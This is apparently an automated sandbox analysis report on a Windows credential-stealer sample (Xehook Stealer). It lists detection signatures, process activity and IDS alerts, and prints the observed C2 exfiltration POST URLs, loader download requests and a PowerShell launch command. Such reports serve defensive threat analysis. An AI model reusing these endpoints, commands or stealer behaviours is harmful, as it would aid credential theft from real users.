Edit tour

Windows Analysis Report
1d0000.MSBuild.exe

Overview

General Information

Sample name:	1d0000.MSBuild.exe
Analysis ID:	1504858
MD5:	41cf033d05ae0e2c5238a7932cf2dc77
SHA1:	df885092f397a0a70f26b98c5abb35253d2cb06c
SHA256:	f307cd4cb26d2d851ca55e9ab039656247ffd3b01b89ad0dcd32adf8e689724b
Tags:	exexehookstealer
Infos:

Detection

Xehook Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected Xehook Stealer

AI detected suspicious sample

Creates HTML files with .exe extension (expired dropper behavior)

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

1d0000.MSBuild.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\1d0000.MSBuild.exe" MD5: 41CF033D05AE0E2C5238A7932CF2DC77)

powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1d0000.MSBuild.exe	JoeSecurity_xehookStealer_1	Yara detected Xehook Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_xehookStealer_1	Yara detected Xehook Stealer	Joe Security
00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_xehookStealer_1	Yara detected Xehook Stealer	Joe Security
Process Memory Space: 1d0000.MSBuild.exe PID: 7416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1d0000.MSBuild.exe PID: 7416	JoeSecurity_xehookStealer_1	Yara detected Xehook Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.1d0000.MSBuild.exe.1c2541e0000.0.unpack	JoeSecurity_xehookStealer_1	Yara detected Xehook Stealer	Joe Security

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1d0000.MSBuild.exe", ParentImage: C:\Users\user\Desktop\1d0000.MSBuild.exe, ParentProcessId: 7416, ParentProcessName: 1d0000.MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", ProcessId: 7660, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Xehook Stealer CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T14:29:13.959077+0200	2051457	1	A Network Trojan was detected	192.168.2.8	49706	65.109.218.88	80	TCP

ET MALWARE Xehook Stealer CnC Checkin - Server Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T14:29:14.649122+0200	2051458	1	A Network Trojan was detected	65.109.218.88	80	192.168.2.8	49706	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T14:29:13.959077+0200	2803305	3	Unknown Traffic	192.168.2.8	49706	65.109.218.88	80	TCP
2024-09-05T14:29:20.601787+0200	2803305	3	Unknown Traffic	192.168.2.8	49710	87.250.250.50	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T14:29:17.912548+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49708	65.109.218.88	80	TCP
2024-09-05T14:29:18.305457+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49708	65.109.218.88	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T14:29:16.248275+0200	2843856	1	A Network Trojan was detected	192.168.2.8	49708	65.109.218.88	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1d0000.MSBuild.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://65.109.218.88	Avira URL Cloud: Label: malware
Source: http://65.109.218.88/	Avira URL Cloud: Label: malware
Source: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect=	Avira URL Cloud: Label: malware
Source: http://65.109.218.88/getloader.php?id=208	Avira URL Cloud: Label: malware
Source: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.	Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 1d0000.MSBuild.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

Code function: 0_2_00007FFB4AE25D62 CryptUnprotectData,

0_2_00007FFB4AE25D62

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49713 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.8:49709 version: TLS 1.2

Source: 1d0000.MSBuild.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051457 - Severity 1 - ET MALWARE Xehook Stealer CnC Checkin : 192.168.2.8:49706 -> 65.109.218.88:80
Source: Network traffic	Suricata IDS: 2051458 - Severity 1 - ET MALWARE Xehook Stealer CnC Checkin - Server Response : 65.109.218.88:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.8:49708 -> 65.109.218.88:80

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

File created: X9ZLAQA9VR.exe.0.dr

Source: global traffic	HTTP traffic detected: GET /d/hBX5q37QQyYzxw HTTP/1.1Host: disk.yandex.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF9227726AC5DF767589B56EFFC37550DB79CE4178BF214B7A79EC94CEBB9CBBF785F279D6138B9BD14671EB6979187FEF29FAD20A816ADDB0C25CB64C4D3FFAA8C59CB4FF975F524DF58D9C726EF9DABCAAE8D866F5F1A47031438B1A545D293F7991C7F47EEEC26D69ED127B315A423F122EA467099809922B6B3D6C83F466ADBA00BBB63DBAEC39785A1B3AD4C0BAC55EF822F5E031DD91A07590FEA25724874FC65DBFE456727AA1379E73039462EA25FE978A83D9F7C143FCA8BD34CBAF8A3&retpath=aHR0cHM6Ly9kaXNrLnlhbmRleC5jb20vZC9oQlg1cTM3UVF5WXp4dz8%2C_fdd026a47fe8852ffee1ed3264f80e31&t=2/1725539359/c4cb01981f591db41a3c0be2ede260d6&u=225b0967-11df21d1-b52d8c2e-3de16a9c&s=042fbec079b9900f8a4a25cd2c7bfa1e HTTP/1.1Host: disk.yandex.com
Source: global traffic	HTTP traffic detected: GET /getjson.php?id=208 HTTP/1.1Host: 65.109.218.88
Source: global traffic	HTTP traffic detected: GET /json/?fields=11827 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 87.250.250.50 87.250.250.50

Source: Joe Sandbox View

ASN Name: ALABANZA-BALTUS ALABANZA-BALTUS

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49706 -> 65.109.218.88:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 65.109.218.88:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 87.250.250.50:443

Source: global traffic	HTTP traffic detected: GET /+w897k5UK_jIyNDgy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect= HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88Content-Length: 163131Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getloader.php?id=208 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88
Source: global traffic	HTTP traffic detected: GET /getloader.php?id=208 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49713 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.218.88

Source: global traffic	HTTP traffic detected: GET /+w897k5UK_jIyNDgy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/hBX5q37QQyYzxw HTTP/1.1Host: disk.yandex.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF9227726AC5DF767589B56EFFC37550DB79CE4178BF214B7A79EC94CEBB9CBBF785F279D6138B9BD14671EB6979187FEF29FAD20A816ADDB0C25CB64C4D3FFAA8C59CB4FF975F524DF58D9C726EF9DABCAAE8D866F5F1A47031438B1A545D293F7991C7F47EEEC26D69ED127B315A423F122EA467099809922B6B3D6C83F466ADBA00BBB63DBAEC39785A1B3AD4C0BAC55EF822F5E031DD91A07590FEA25724874FC65DBFE456727AA1379E73039462EA25FE978A83D9F7C143FCA8BD34CBAF8A3&retpath=aHR0cHM6Ly9kaXNrLnlhbmRleC5jb20vZC9oQlg1cTM3UVF5WXp4dz8%2C_fdd026a47fe8852ffee1ed3264f80e31&t=2/1725539359/c4cb01981f591db41a3c0be2ede260d6&u=225b0967-11df21d1-b52d8c2e-3de16a9c&s=042fbec079b9900f8a4a25cd2c7bfa1e HTTP/1.1Host: disk.yandex.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getjson.php?id=208 HTTP/1.1Host: 65.109.218.88
Source: global traffic	HTTP traffic detected: GET /json/?fields=11827 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getloader.php?id=208 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88
Source: global traffic	HTTP traffic detected: GET /getloader.php?id=208 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: disk.yandex.com

Source: unknown

HTTP traffic detected: POST /xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect= HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36Host: 65.109.218.88Content-Length: 163131Expect: 100-continueConnection: Keep-Alive

Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.109.218.88
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.109.218.88/
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.109.218.88/getloader.php?id=208
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://disk.yandex.com
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: 1d0000.MSBuild.exe	String found in binary or memory: http://ip-api.com/json/?fields=11827
Source: 1d0000.MSBuild.exe	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://disk.yandex.com
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://disk.yandex.com(
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://disk.yandex.com/d/hBX5q37QQyYzxw
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://disk.yandex.com/showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF922
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E50000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, X9ZLAQA9VR.exe.0.dr	String found in binary or memory: https://yandex.com/support/common/browsers-settings/browsers-java-js-settings.html
Source: X9ZLAQA9VR.exe.0.dr	String found in binary or memory: https://yandex.com/support/smart-captcha/problems.html?form-unique_key=225b0967-11df21d1-b52d8c2e-3d
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, X9ZLAQA9VR.exe.0.dr	String found in binary or memory: https://yastatic.net/s3/home-static/_/90/9034470dfcb0bea0db29a281007b8a38.png

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.8:49709 version: TLS 1.2

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE20906	0_2_00007FFB4AE20906
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE182A2	0_2_00007FFB4AE182A2
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE1753F	0_2_00007FFB4AE1753F

Source: 1d0000.MSBuild.exe, 00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamexehook.exe" vs 1d0000.MSBuild.exe
Source: 1d0000.MSBuild.exe	Binary or memory string: OriginalFilenamexehook.exe" vs 1d0000.MSBuild.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/8@3/4

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

File created: C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpu5wea.rea.ps1

Jump to behavior

Source: 1d0000.MSBuild.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1d0000.MSBuild.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255F63000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\1d0000.MSBuild.exe "C:\Users\user\Desktop\1d0000.MSBuild.exe"
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"
